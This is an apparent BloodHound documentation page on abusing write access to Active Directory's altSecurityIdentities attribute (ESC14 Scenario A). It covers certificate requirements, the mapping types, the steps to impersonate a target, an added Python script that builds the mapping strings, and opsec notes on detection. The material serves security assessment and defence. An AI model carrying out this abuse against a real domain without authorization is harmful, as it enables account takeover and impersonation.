The altSecurityIdentities attribute stores explicit certificate mappings for a principal. An explicit certificate mapping binds a specific certificate to the principal as an alternative to the normal certificate-to-account mapping rules, so that certificate can be used to authenticate as the principal.
Abuse Info
Write access to altSecurityIdentities may enable an ADCS ESC14 Scenario A attack.
An attacker can add an explicit certificate mapping on the target that refers to a certificate in the attacker’s possession, then use that certificate to authenticate as the target.
The certificate must meet the following requirements:
- Chain up to a root CA trusted by the domain controller.
- Include an Enhanced Key Usage (EKU) extension that enables domain authentication, i.e. one of:
  - Client Authentication (1.3.6.1.5.5.7.3.2)
  - PKINIT Client Authentication (1.3.6.1.5.2.3.4)
  - Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
  - Any Purpose (2.5.29.37.0)
  - SubCA (no EKUs)
- Not include an Other Name / Principal Name (UPN) entry in the Subject Alternative Name (SAN).
The default Computer (Machine) certificate template meets these requirements and grants Domain Computers enrollment rights, so a certificate enrolled as a computer works even when the target is a user.
The last requirement does not apply if the domain controller has UPN mapping disabled. See How to disable the Subject Alternative Name for UPN mapping.
The abuse is possible with the strong explicit certificate mapping types X509IssuerSerialNumber and X509SHA1PublicKey; the weak types (X509IssuerSubject, X509SubjectOnly, X509RFC822) are rejected once domain controllers enforce strong certificate mapping (the Full Enforcement mode introduced by KB5014754). The examples below use X509SHA1PublicKey.
Linux
Obtain a certificate that meets the requirements above, for example by dumping a certificate from a computer or enrolling a new certificate as a computer. The enrollee must have the mail or dNSHostName attribute set if the certificate template requires it: mail can be set on users and computers, but dNSHostName only on computers. Computers have validated write permission to their own dNSHostName attribute by default, whereas neither users nor computers can write their own mail attribute by default.
Then compute the SHA1 hash of the certificate's public key, add the resulting X509SHA1PublicKey mapping to the target's altSecurityIdentities attribute, and authenticate with the certificate as the target.
Windows
Obtain a certificate that meets the requirements above, for example by dumping a certificate from a computer or enrolling a new certificate as a computer with Certify (2.0). Save the certificate as cert.pem and the private key as cert.key, then convert it to a PFX file.
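The public-key hash and mapping-string steps of the Linux and Windows procedures above, as an added example that is not part of the original page or of BloodHound's own tooling: a stdlib-only Python script that parses a PEM or DER certificate, takes the SHA1 over its DER-encoded SubjectPublicKeyInfo (the same bytes `openssl pkey -pubin -outform DER` writes) and formats the X509SHA1PublicKey value, and for comparison also builds the X509IssuerSerialNumber value, whose serial number is byte-reversed and whose issuer DN is written most-significant RDN first, following Microsoft's documented example. The sample certificate, the CA name CORP-CA, the host WS01.corp.local and the issuer string DC=local,DC=corp,CN=CORP-CA are constructed for the demonstration; the sample is unsigned and carries a placeholder key, so only its structure is realistic.

```python
"""Build altSecurityIdentities mapping strings from an X.509 certificate.
Added example (stdlib only): walks the DER Certificate far enough to pull out
serialNumber and subjectPublicKeyInfo, then formats the two strong mappings the
text names. X509:<SHA1-PUKEY> hashes the DER SubjectPublicKeyInfo (the bytes
`openssl pkey -pubin -outform DER` emits); X509:<I>..<SR>.. byte-reverses the serial.
"""
import base64
import hashlib
import re

def _der_tlv(buf: bytes, off: int = 0):
    """Decode one DER TLV at `off`; return (tag, value, end_offset)."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:                       # long form: next N bytes carry the length
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, buf[off:off + length], off + length

def _der_children(value: bytes):
    """Split a constructed type's content into (tag, value, raw_tlv) tuples."""
    out, off = [], 0
    while off < len(value):
        tag, val, end = _der_tlv(value, off)
        out.append((tag, val, value[off:end]))
        off = end
    return out

def load_cert_der(data: bytes) -> bytes:
    """Accept a PEM certificate or raw DER and return the DER bytes."""
    if data.lstrip().startswith(b"-----BEGIN"):
        body = re.sub(rb"-----[^-]+-----", b"", data)
        return base64.b64decode(b"".join(body.split()))
    return data

def spki_and_serial(cert: bytes):
    """Return (subjectPublicKeyInfo DER, serialNumber bytes) of a certificate."""
    _, cert_body, _ = _der_tlv(load_cert_der(cert))    # Certificate ::= SEQUENCE
    _, tbs, _ = _der_tlv(cert_body)                     # tbsCertificate ::= SEQUENCE
    fields = _der_children(tbs)
    if fields[0][0] == 0xA0:                            # optional [0] EXPLICIT version
        fields = fields[1:]
    # RFC 5280 order: serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo
    serial = fields[0][1].lstrip(b"\x00") or b"\x00"    # drop INTEGER sign-padding byte
    return fields[5][2], serial

def sha1_pukey_mapping(cert: bytes) -> str:
    """X509SHA1PublicKey mapping value for `cert` (PEM or DER)."""
    spki, _ = spki_and_serial(cert)
    return "X509:<SHA1-PUKEY>" + hashlib.sha1(spki).hexdigest().upper()

def issuer_serial_mapping(cert: bytes, issuer_reversed: str) -> str:
    """X509IssuerSerialNumber mapping value. `issuer_reversed` is the issuer DN with
    the most significant RDN first, as in Microsoft's documented examples
    (e.g. 'DC=local,DC=corp,CN=CORP-CA'); the serial number is byte-reversed."""
    _, serial = spki_and_serial(cert)
    return f"X509:<I>{issuer_reversed}<SR>{serial[::-1].hex().upper()}"

# ---- constructed sample input (not a real CA-issued certificate) ----------------
def _der(tag: int, content: bytes) -> bytes:
    """Minimal DER TLV encoder, used only to build the sample certificate."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content

def _name(cn: str) -> bytes:
    """Name ::= SEQUENCE OF SET OF AttributeTypeAndValue, here a lone CN."""
    atv = _der(0x30, _der(0x06, b"\x55\x04\x03") + _der(0x0C, cn.encode()))
    return _der(0x30, _der(0x31, atv))

def constructed_sample_cert() -> bytes:
    """Unsigned, certificate-shaped DER with a placeholder RSA key; the serial is
    the one from Microsoft's altSecurityIdentities example (2B0000000011AC0000000012)."""
    alg_sig = _der(0x30, _der(0x06, bytes.fromhex("2A864886F70D01010B")) + _der(0x05, b""))  # sha256WithRSA
    alg_rsa = _der(0x30, _der(0x06, bytes.fromhex("2A864886F70D010101")) + _der(0x05, b""))  # rsaEncryption
    modulus = b"\x00" + bytes(range(128, 0, -1))          # 1024-bit placeholder, needs sign pad
    rsa_key = _der(0x30, _der(0x02, modulus) + _der(0x02, b"\x01\x00\x01"))
    spki = _der(0x30, alg_rsa + _der(0x03, b"\x00" + rsa_key))   # BIT STRING, 0 unused bits
    validity = _der(0x30, _der(0x17, b"240101000000Z") + _der(0x17, b"250101000000Z"))
    tbs = _der(0x30, _der(0xA0, _der(0x02, b"\x02"))              # version v3
               + _der(0x02, bytes.fromhex("2B0000000011AC0000000012"))
               + alg_sig + _name("CORP-CA") + validity + _name("WS01.corp.local") + spki)
    return _der(0x30, tbs + alg_sig + _der(0x03, b"\x00" * 129))  # dummy signature

def as_pem(der: bytes) -> bytes:
    """Wrap DER in a PEM envelope so the PEM input path can be exercised."""
    b64 = base64.b64encode(der)
    body = b"\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return b"-----BEGIN CERTIFICATE-----\n" + body + b"\n-----END CERTIFICATE-----\n"

if __name__ == "__main__":
    cert = constructed_sample_cert()
    print(sha1_pukey_mapping(cert))
    print(issuer_serial_mapping(cert, "DC=local,DC=corp,CN=CORP-CA"))
```

On a real certificate, sha1_pukey_mapping(open("cert.pem", "rb").read()) returns the value to write into the target's altSecurityIdentities. Before writing it, compare the hash with the output of openssl x509 -in cert.pem -noout -pubkey | openssl pkey -pubin -outform DER | openssl dgst -sha1 for the same file; a mapping built from the wrong hash (for example over the raw key bits rather than the full SubjectPublicKeyInfo) never matches at the KDC and fails silently from the attacker's side.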
Opsec Considerations
When the affected certificate authority issues the certificate to the attacker, it retains a local copy of that certificate in its issued certificates store. Defenders may analyze issued certificates to identify illegitimately issued certificates and the principal that requested them.
Edge Schema
Source: User, Group, Computer
Destination: User, Computer
Traversable: Yes